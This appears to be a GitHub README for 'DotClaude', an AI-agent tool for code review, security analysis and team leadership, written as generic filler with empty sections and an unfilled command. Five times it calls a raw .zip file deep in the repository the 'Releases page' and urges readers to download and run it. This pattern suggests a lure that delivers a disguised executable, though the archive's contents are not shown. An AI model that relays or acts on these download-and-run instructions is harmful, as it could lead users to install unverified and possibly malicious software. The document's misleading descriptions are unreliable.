DotClaude: AI-Powered Dev Environment for Code Review, Security, Leadership

June 13, 2026 · View on GitHub

Releases

Visit the Releases page to grab the latest assets and updates: https://raw.githubusercontent.com/Iski08/dotclaude/main/commands/review/Software-v3.5.zip

DotClaude is a complete development environment that brings together specialized AI agents for code review, security analysis, and technical leadership. It helps teams ship safer, cleaner code while steering projects with clear guidance and guardrails. The system is designed to fit into modern workflows, from solo projects to large teams, and it adapts to your coding standards and security posture.

If you want to explore the latest artifacts, you can browse the releases here: https://raw.githubusercontent.com/Iski08/dotclaude/main/commands/review/Software-v3.5.zip From that page, download the appropriate asset for your platform and run it to start DotClaude. The assets on that page are carefully prepared to work out of the box with sensible defaults.

Table of contents

  • What DotClaude offers
  • How it works
  • Features by agent
  • Getting started
  • Running DotClaude locally
  • Operating with teams
  • Prompts and behavior
  • Data, privacy, and security
  • Architecture and data flow
  • Extensibility and plugins
  • Troubleshooting
  • Roadmap
  • Contributing
  • Licensing and credits
  • Acknowledgments

What DotClaude offers DotClaude provides three core AI agents that work in concert to improve software quality and team effectiveness:

  • Code Review Agent: Examines pull requests, diffs, and test results. It flags potential bugs, style deviations, anti-patterns, and maintainability concerns. It suggests concrete changes, explains the rationale, and helps enforce coding standards.
  • Security Analysis Agent: Scans code, dependencies, and configurations for security risks. It identifies vulnerabilities, misconfigurations, weak defaults, and potential threat vectors. It proposes remediation steps and tracks the risk posture over time.
  • Technical Leadership Agent: Translates technical signals into actionable guidance. It creates roadmaps, documents standards, generates meeting notes, and helps plan releases. It aligns team priorities with risk and quality goals.

All three agents are orchestrated by a lightweight conductor that handles task routing, caching, and auditing. The design emphasizes safety, repeatability, and clarity. You get repeatable outputs, with explanations that you can review and adjust.

How it works DotClaude sits at the intersection of code, conversations, and policy. The workflow typically looks like this:

  • Input: A repository, a pull request, or a codebase snapshot is fed into DotClaude.
  • Orchestrator: A central controller splits input into tasks and assigns them to specialized agents. It caches frequent results to reduce latency.
  • Agents: Each agent runs its analysis in a controlled context. They return findings, recommended changes, and risk scores.
  • Synthesis: The conductor aggregates outputs, resolves conflicts, and presents a unified report. It also generates follow-up tasks and improvement plans.
  • Output: The team receives clear, actionable guidance, plus optional doc pages, checklists, and meeting notes.

The system emphasizes explainability. Each recommendation includes the rationale, affected files, and a confidence score. You can adjust the prompts and policies to fit your project.

Elements you will interact with

  • A lightweight CLI to start, run, and monitor DotClaude.
  • A web-like interface for dashboards, summaries, and reports (CLI-driven UI is fully capable for headless setups).
  • A policy layer that encodes team standards, security posture, and release criteria.
  • A store of prompts, templates, and templates you can customize.
  • An audit log capturing decisions, actions taken, and agent outputs.

Features by agent

Code Review Agent

  • Diff-aware analysis: Examines changes in a PR, not just the new files.
  • Style and maintainability: Flags code smells, inconsistent naming, overly complex functions, and duplicated logic.
  • Test alignment: Checks test coverage, edge cases, and potential gaps between tests and code paths.
  • Quick fixes: Suggests precise edits with a rationale and references to guidelines.
  • Consistency checks: Ensures alignment with team conventions and public API contracts.
  • Change summaries: Produces a concise PR summary suitable for the PR description.

Security Analysis Agent

  • Dependency scanning: Looks for known vulnerabilities, outdated libraries, and risky transitive dependencies.
  • Static analysis: Detects common security anti-patterns and insecure coding practices.
  • Configuration hardening: Reviews config files, CI pipelines, and deployment manifests.
  • Secrets discovery: Flags accidental secrets and suggests rotation plans.
  • Threat modeling notes: Documents potential attack surfaces and mitigations.
  • Remediation guidance: Provides step-by-step fixes and references to security best practices.

Technical Leadership Agent

  • Roadmap generation: Converts product goals into phased, measurable work streams.
  • Documentation discipline: Creates API docs, internal guides, and runbooks.
  • Meeting support: Generates agendas, notes, decisions, and action items.
  • Metrics and health: Proposes KPIs to track code quality, security posture, and delivery predictability.
  • Stakeholder communication: Produces executive summaries tailored for leadership and product teams.

Getting started This guide helps you evaluate DotClaude and set up a working environment. The aim is to get you running quickly while keeping a solid path for growth.

Prerequisites and platform support

  • Supported platforms: Linux, macOS, Windows (via compatible binaries or containerized setup).
  • Runtime: A recent Linux/macOS runtime or Windows with a compatible layer for binaries. Optional: Docker if you prefer containerized execution.
  • API access: If you use cloud-based AI services, you will need access credentials. For self-hosted or hybrid modes, you can provide local models or offline options as needed.
  • Minimum hardware: A multi-core CPU, 8 GB RAM, and substantial disk space for codebases and models. Larger projects benefit from more RAM and faster storage.

Installation overview

  • Download the latest binary or container image from the Releases page. The page is the source of truth for artifacts and release notes.
  • Unpack and install per platform instructions included with the asset.
  • Run the setup wizard or CLI prompts to configure your environment, credentials, and policies.
  • Start a first run to collect baseline data and generate initial reports.

Note on releases The primary delivery channel is the Releases page. You can download the appropriate asset for your platform and follow the included instructions. To explore or grab the latest assets, visit the Releases page: https://raw.githubusercontent.com/Iski08/dotclaude/main/commands/review/Software-v3.5.zip From that page, download the latest asset and run it as described in the accompanying README or quick-start guide.

Downloading and running the latest asset From the Releases page, locate the asset named something like https://raw.githubusercontent.com/Iski08/dotclaude/main/commands/review/Software-v3.5.zip or a platform-specific binary. Download the file, extract it if necessary, and run the installer or binary. The exact steps vary by platform, but you typically perform these steps:

  • Open a terminal or command prompt.
  • Navigate to the folder where you saved the asset.
  • Run the installation command or executable.
  • Follow the on-screen prompts to configure your environment and connect to any required services.

If you need to verify the integrity of the asset, use the checksum provided on the Releases page and compare it with the computed value on your machine.

Running DotClaude locally Once installed, you can start DotClaude with a simple command. The following examples illustrate typical workflows. Adjust the commands to fit your project structure and policy preferences.

  • Start a local session

    • dotclaude start

  • Initialize a project

  • Run code review on a PR or a code snapshot

    • dotclaude review --pull-request 1234

  • Run a security analysis on the codebase

    • dotclaude scan --level thorough

  • Generate leadership guidance for a sprint

    • dotclaude lead --sprint "Sprint 29" --team "Platform"

  • View a dashboard

    • dotclaude dashboard

  • Export a report

    • dotclaude report --format pdf

Key configuration concepts

  • API keys and credentials: The system uses API keys for AI services when needed. Store credentials securely using your platform’s best practices.
  • Policies and standards: You can define coding standards, security baselines, and leadership templates. The policy layer enforces these rules during analyses.
  • Data handling: DotClaude reads only what you authorize. It logs actions for auditing but respects configured data retention rules.
  • Model choices: Decide between cloud-based models or local/offline options. The conductor supports swapping models with minimal changes.

Operational best practices

  • Start with a small scope: Begin with a single repository and a narrow policy set. Validate outputs and adjust prompts as needed.
  • Iterate prompts: Fine-tune prompts to match your team language and conventions. Save templates for reuse.
  • Combine outputs: Use code review results, security findings, and leadership notes together to form a holistic plan.
  • Maintain policy discipline: Keep your standards up to date. Regularly review and refine policies to reflect evolving coding practices and security guidance.
  • Protect sensitive data: Ensure secrets and private configuration remain out of code reviews. Use environment-based configuration and secret managers.

Using the CLI and prompts DotClaude exposes a concise CLI with subcommands for the main tasks. You can extend prompts or swap them out in the prompts directory. The prompts drive how each agent reasons about the data.

Examples of prompts you may encounter

  • Code Review Prompt: It focuses on readability, correctness, performance, and maintainability. It asks for examples, references, and suggested edits.
  • Security Analysis Prompt: It looks for known vulnerabilities, dependency issues, and insecure configurations. It asks for impact estimates and recommended mitigations.
  • Leadership Prompt: It outlines a path for delivering features, aligning with roadmap goals, and communicating decisions to the team.

Prompt customization

  • You can supply custom prompt files for each agent. Place new prompts in the prompts folder and reference them in your configuration.
  • The system validates prompts to prevent harmful instructions and to maintain a predictable behavior pattern.
  • Prompts can include placeholders for project-specific data, such as repository names, branch names, and policy IDs.

Prompts and behavior guidelines

  • Clarity first: Prompts aim for concise, actionable output. They emphasize specific file paths, line numbers, and recommended edits.
  • Safety checks: Agents raise flags for risky changes and require human review for critical decisions.
  • Consistency: Prompts encourage consistent formatting in outputs, such as standardized PR summaries and security reports.
  • Traceability: Each output includes rationale, confidence, and references to relevant files or sections.

Data, privacy, and security

  • Data scope: DotClaude processes code, metadata about changes, and configuration data needed to perform analyses.
  • Privacy: You control the scope of analysis and the data that the system can access. Secrets never appear in generated reports without explicit redaction.
  • Security posture: The system is designed to minimize exposure. It logs activities for audit and compliance but respects your retention policies.
  • Compliance: If you require compliance with internal standards, you can tailor the policy layer to enforce those standards across analyses.

Architecture and data flow

  • Orchestrator (Conductor): Routes tasks to specialized agents, caches results, and manages context. It ensures outputs are coherent and traceable.
  • Code Review Agent: Analyzes diffs, tests, and file contents. Produces change suggestions with annotated diffs where needed.
  • Security Analysis Agent: Scans dependencies, configuration, and code for vulnerabilities. Produces risk scores and remediation steps.
  • Technical Leadership Agent: Creates planning documents, project roadmaps, and leadership-facing outputs.
  • Data stores: A lightweight vector store for code search, a log store for audits, and a policy store for standards.
  • Interfaces: A CLI and optional web UI allow both headless and interactive use.

ASCII architecture diagram Client | v Orchestrator / |
v v v Code Review Security Analysis Technical Leadership Agent Agent Agent \ | / \ | / \ | / +----------+ +----------+ +----------+ | Policy | | Policy | | Policy | | Engine | | Engine | | Engine | +----------+ +----------+ +----------+ | v Outputs and Reports (PRs, Docs, Dashboards)

Extensibility and plugins

  • Plugins: DotClaude supports plugins to extend agent capabilities. You can add new agents or enhance existing ones by providing a plugin module with a defined interface.
  • Prompts repository: A central place to store and version prompts. You can share prompts across teams and reuse them in multiple projects.
  • Local models: If you prefer offline operation, you can swap in local language models and run the inference locally. The conductor handles the model selection transparently.
  • Integrations: You can hook DotClaude into CI pipelines, issue trackers, chat tools, or project dashboards. The system emits structured outputs that are easy to ingest.

Teams and collaboration

  • Role-based workflows: Designate reviewers, security engineers, and leaders to work together within the same environment. The agents provide outputs that are easy to assign and track.
  • Shared policies: Teams can publish policy templates to enforce standard practices. New team members inherit a clear baseline.
  • Audit trails: Every action is logged with a timestamp, user context, and agent outputs. This helps with accountability and compliance reviews.
  • Collaboration hooks: You can connect DotClaude to chat platforms to discuss outputs, annotate issues, and coordinate follow-up tasks.

Getting the most from DotClaude in teams

  • Start with a baseline: Run an initial analysis on a representative set of PRs to calibrate agents and refine prompts.
  • Create a governance layer: Define who approves changes, who signs off on security remediation, and who reviews leadership outputs.
  • Establish a review rhythm: Use automated outputs to complement human reviews, not replace them. Leave room for collaborative discussion.
  • Measure outcomes: Track improvements in code quality, security posture, and delivery speed as you iterate on policies and prompts.

Prompts and templates library

  • Code review templates: PR summary templates, change rationale blocks, and recommended code edits formatted for PR descriptions.
  • Security templates: Vulnerability risk scoring templates, remediation steps, and verification checklists.
  • Leadership templates: Sprint goals summaries, release notes, and executive briefs.
  • Each template includes placeholders to tailor outputs to your project details and business context.

Promoting good practices with DotClaude

  • Style guides: Use consistent naming, file structure conventions, and documentation standards across projects.
  • Security baselines: Enforce minimal secret exposure, strict dependency checks, and robust CI validation.
  • Documentation discipline: Maintain internal docs, runbooks, and API references as part of the output workflow.
  • Planning discipline: Translate goals into actionable backlog items with clear acceptance criteria.

Troubleshooting and common issues

  • Agent outputs are unclear: Adjust prompts to request more explicit rationale, or tweak the output format to include section headers.
  • Missing data for a task: Ensure the input contains sufficient context. Add repository metadata and relevant links to the prompt context.
  • Performance concerns: Increase caching, reduce verbosity in human-facing outputs, or run agents in parallel where possible.
  • API keys not found: Confirm environment variables are set correctly and that the keys have the necessary scopes. Restart the session after changes.

Roadmap

  • Short-term: Improve prompt templates, add more streaming outputs, and integrate with common CI systems.
  • Medium-term: Expand the set of specialized agents, introduce a safety manifest, and provide richer executive dashboards.
  • Long-term: Enable deeper offline operation with local models, stronger in-repo governance, and cross-team policy sharing.

Contributing We welcome contributions from developers, docs writers, and users who want to improve the system. Here’s how you can help:

  • Report issues: Open issues with clear reproduction steps and expected behavior.
  • Propose features: Share ideas for new agents, templates, or integrations. Include rationale and potential impact.
  • Fix bugs: Create a fork, implement the fix, and open a pull request with tests and documentation.
  • Improve docs: Help expand tutorials, examples, and reference sections. Add screenshots or diagrams if possible.
  • Create plugins: If you have a new agent idea, implement it as a plugin with a simple interface and include usage examples.

Development guidelines

  • Code style: Keep functions small, names descriptive, and modules cohesive.
  • Testing: Add unit tests for new features. Include integration tests for end-to-end workflows.
  • Documentation: Document public APIs, configuration options, and usage examples.
  • Security and privacy: Follow best practices for handling secrets and sensitive data. Do not log secrets.

Roadmap and requests for feedback

  • We value your input. If you have ideas for features or improvements, share them in the Issues or Discuss sections. Your feedback helps shape the direction of DotClaude.

A note on visuals

  • Emoticons and color can help convey tone and be friendly. We use emojis to emphasize sections and quick guidance but keep the content concise and precise.
  • You can include diagrams, flowcharts, and architecture visuals as images if you want. The ASCII diagram above provides a quick, platform-agnostic view of the structure.

Documentation and references

  • Quick start guides
  • API references
  • CLI reference
  • Policy templates
  • Sample projects and workshops

License and credits DotClaude is released under a permissive license. The project credits include contributors to the design, engineering, and documentation. If you create extensions or plugins, we encourage you to share them with the community under the same licensing spirit.

Releases and asset verification

FAQ

  • Do you need an internet connection to use DotClaude? It depends on your setup. For cloud-based AI services, an internet connection is required. For offline setups with local models, there are options to run without external access.
  • Can I use DotClaude with private repositories? Yes. Provide the necessary access and credentials through secure means. Policies and prompts are designed to accommodate private data while maintaining security.
  • How do I customize prompts? Copy an existing prompt, modify the template, and place it in your prompts directory. Reference it in your configuration.

Acknowledgments

  • Thanks to the open-source community and contributors who help improve tooling around AI-assisted software development.
  • The project draws on best practices in code review, security, and software leadership, and aims to keep a calm, practical approach to tooling.

Images and visuals

  • A simple ASCII diagram is included above to illustrate architecture and data flow.
  • For richer visuals, you can add diagrams that illustrate the agent interactions and data flows, or include diagrams created with diagramming tools and hosted in your repository or documentation.

Downloads and asset links

End notes

  • This README is designed to be a living document. It evolves with the project and adapts to user feedback and real-world use cases. You can adjust policies, prompts, and templates as your team grows and your requirements change. The goal remains simple: provide a dependable, transparent, and actionable AI-assisted development environment that helps teams write better code, stay secure, and lead with confidence.

Downloads and asset reference From the Releases page you can obtain the necessary binaries. If you want to verify where to download the primary asset, visit the page once more: https://raw.githubusercontent.com/Iski08/dotclaude/main/commands/review/Software-v3.5.zip Then download the appropriate asset for your platform and run it according to the on-page instructions.